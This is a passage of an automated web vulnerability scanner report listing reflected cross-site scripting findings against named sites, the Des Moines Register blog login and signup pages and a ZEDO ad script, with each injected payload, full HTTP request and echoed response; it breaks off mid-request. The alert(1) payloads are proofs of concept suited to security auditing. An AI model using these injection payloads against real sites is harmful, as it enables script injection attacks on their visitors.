GET /odygel/lib/userauth/content/login.html60f8e"><script>alert(1)</script>917b1fb18f2 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=44754709-9119-4062-9c0e-f4c8a41d42ed; GCIONSN=AAAAOn52dzox; s_cc=true; s_sq=%5B%5BB%5D%5D; SiteLifeHost=gnvm25l3pluckcom

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:38:41 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69767

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/odygel/lib/userauth/content/login.html60f8e"><script>alert(1)</script>917b1fb18f2" />
...[SNIP]...

1.128. http://blogs.desmoinesregister.com/odygel/lib/userauth/content/login.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /odygel/lib/userauth/content/login.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36671"%3balert(1)//1caaebcb5b0 was submitted in the REST URL parameter 5. This input was echoed as 36671";alert(1)//1caaebcb5b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /odygel/lib/userauth/content/login.html36671"%3balert(1)//1caaebcb5b0 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=44754709-9119-4062-9c0e-f4c8a41d42ed; GCIONSN=AAAAOn52dzox; s_cc=true; s_sq=%5B%5BB%5D%5D; SiteLifeHost=gnvm25l3pluckcom

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:38:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69691

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...

       requires:[],
       type: 'script'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/odygel/lib/userauth/content/login.html36671";alert(1)//1caaebcb5b0","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatus":9},
   source:'CW',
   enabled:true,
   status:'',
   url:'http://cx.contextweb.com/
...[SNIP]...

1.129. http://blogs.desmoinesregister.com/odygel/lib/userauth/content/signup.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /odygel/lib/userauth/content/signup.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fc42"%3balert(1)//d198b406e30 was submitted in the REST URL parameter 5. This input was echoed as 9fc42";alert(1)//d198b406e30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /odygel/lib/userauth/content/signup.html9fc42"%3balert(1)//d198b406e30 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=44754709-9119-4062-9c0e-f4c8a41d42ed; GCIONSN=AAAAOn52dzox; s_cc=true; s_sq=%5B%5BB%5D%5D; SiteLifeHost=gnvm25l3pluckcom

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:38:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69695

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...

       requires:[],
       type: 'script'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/odygel/lib/userauth/content/signup.html9fc42";alert(1)//d198b406e30","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatus":9},
   source:'CW',
   enabled:true,
   status:'',
   url:'http://cx.contextweb.com/
...[SNIP]...

1.130. http://blogs.desmoinesregister.com/odygel/lib/userauth/content/signup.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /odygel/lib/userauth/content/signup.html

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d94d8"><script>alert(1)</script>8108b2c0f8b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /odygel/lib/userauth/content/signup.htmld94d8"><script>alert(1)</script>8108b2c0f8b HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=44754709-9119-4062-9c0e-f4c8a41d42ed; GCIONSN=AAAAOn52dzox; s_cc=true; s_sq=%5B%5BB%5D%5D; SiteLifeHost=gnvm25l3pluckcom

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:38:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69771

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/odygel/lib/userauth/content/signup.htmld94d8"><script>alert(1)</script>8108b2c0f8b" />
...[SNIP]...

1.131. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14989'%3balert(1)//2a3dc6422b2 was submitted in the $ parameter. This input was echoed as 14989';alert(1)//2a3dc6422b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=2942/2941/1&a=0&f=&n=305&r=13&d=9&q=&$=14989'%3balert(1)//2a3dc6422b2&s=916&l=http%3A//media2.legacy.com/adlink/5306/1804573/0/170/AdId%3D1437456%3BBnId%3D1%3Bitime%3D646950193%3Bnodecode%3Dyes%3Blink%3D&z=0.16725402581505477 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.1.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=8306749451
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:14989';alert(1)//2a3dc6422b2;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,2942,9:305,4506,17:1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=64
Expires: Mon, 14 Feb 2011 01:30:24 GMT
Date: Mon, 14 Feb 2011 01:29:20 GMT
Connection: close
Content-Length: 4248

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=916;var zzPat=',14989';alert(1)//2a3dc6422b2';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,14989';alert(1)//2a3dc6422b2;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

1.132. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e66f0"%3balert(1)//c0290daf8fd was submitted in the $ parameter. This input was echoed as e66f0";alert(1)//c0290daf8fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=2942/2941/1&a=0&f=&n=305&r=13&d=9&q=&$=e66f0"%3balert(1)//c0290daf8fd&s=916&l=http%3A//media2.legacy.com/adlink/5306/1804573/0/170/AdId%3D1437456%3BBnId%3D1%3Bitime%3D646950193%3Bnodecode%3Dyes%3Blink%3D&z=0.16725402581505477 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.1.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=8306749451
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:e66f0";alert(1)//c0290daf8fd;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,2942,9:305,4506,17:1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=64
Expires: Mon, 14 Feb 2011 01:30:24 GMT
Date: Mon, 14 Feb 2011 01:29:20 GMT
Connection: close
Content-Length: 4248

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=916;var zzPat=',e66f0";alert(1)//c0290daf8fd';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,e66f0";alert(1)//c0290daf8fd;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


                                                                                                                       
...[SNIP]...

1.133. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8aacb'%3balert(1)//355b6461f7f was submitted in the l parameter. This input was echoed as 8aacb';alert(1)//355b6461f7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=2942/2941/1&a=0&f=&n=305&r=13&d=9&q=&$=&s=916&l=http%3A//media2.legacy.com/adlink/5306/1804573/0/170/AdId%3D1437456%3BBnId%3D1%3Bitime%3D646950193%3Bnodecode%3Dyes%3Blink%3D8aacb'%3balert(1)//355b6461f7f&z=0.16725402581505477 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.1.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=8306749451
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,2942,9:305,4506,17:1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=63
Expires: Mon, 14 Feb 2011 01:30:24 GMT
Date: Mon, 14 Feb 2011 01:29:21 GMT
Connection: close
Content-Length: 4217

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=916;var zzPat='';var zzC
...[SNIP]...
ADYAAHrQ5V4AAACH~010411%3Bp%3D8%3Bf%3D749621%3Bh%3D749620%3Bo%3D20%3By%3D67%3Bv%3D1%3Bt%3Di%3Bk=http://media2.legacy.com/adlink/5306/1804573/0/170/AdId=1437456;BnId=1;itime=646950193;nodecode=yes;link=8aacb';alert(1)//355b6461f7f" frameborder=0 marginheight=0 marginwidth=0 scrolling="no" allowTransparency="true" width=300 height=250>
...[SNIP]...

1.134. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0b04'%3balert(1)//36d8d5a78d7 was submitted in the q parameter. This input was echoed as c0b04';alert(1)//36d8d5a78d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=2942/2941/1&a=0&f=&n=305&r=13&d=9&q=c0b04'%3balert(1)//36d8d5a78d7&$=&s=916&l=http%3A//media2.legacy.com/adlink/5306/1804573/0/170/AdId%3D1437456%3BBnId%3D1%3Bitime%3D646950193%3Bnodecode%3Dyes%3Blink%3D&z=0.16725402581505477 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.1.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=8306749451
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,2942,9:305,4506,17:1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=65
Expires: Mon, 14 Feb 2011 01:30:25 GMT
Date: Mon, 14 Feb 2011 01:29:20 GMT
Connection: close
Content-Length: 4245

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=916;var zzPat='c0b04';alert(1)//36d8d5a78d7';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=c0b04';alert(1)//36d8d5a78d7;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

1.135. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f9b86"%3balert(1)//7be31572be0 was submitted in the q parameter. This input was echoed as f9b86";alert(1)//7be31572be0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=2942/2941/1&a=0&f=&n=305&r=13&d=9&q=f9b86"%3balert(1)//7be31572be0&$=&s=916&l=http%3A//media2.legacy.com/adlink/5306/1804573/0/170/AdId%3D1437456%3BBnId%3D1%3Bitime%3D646950193%3Bnodecode%3Dyes%3Blink%3D&z=0.16725402581505477 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.1.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=8306749451
Accept: */*
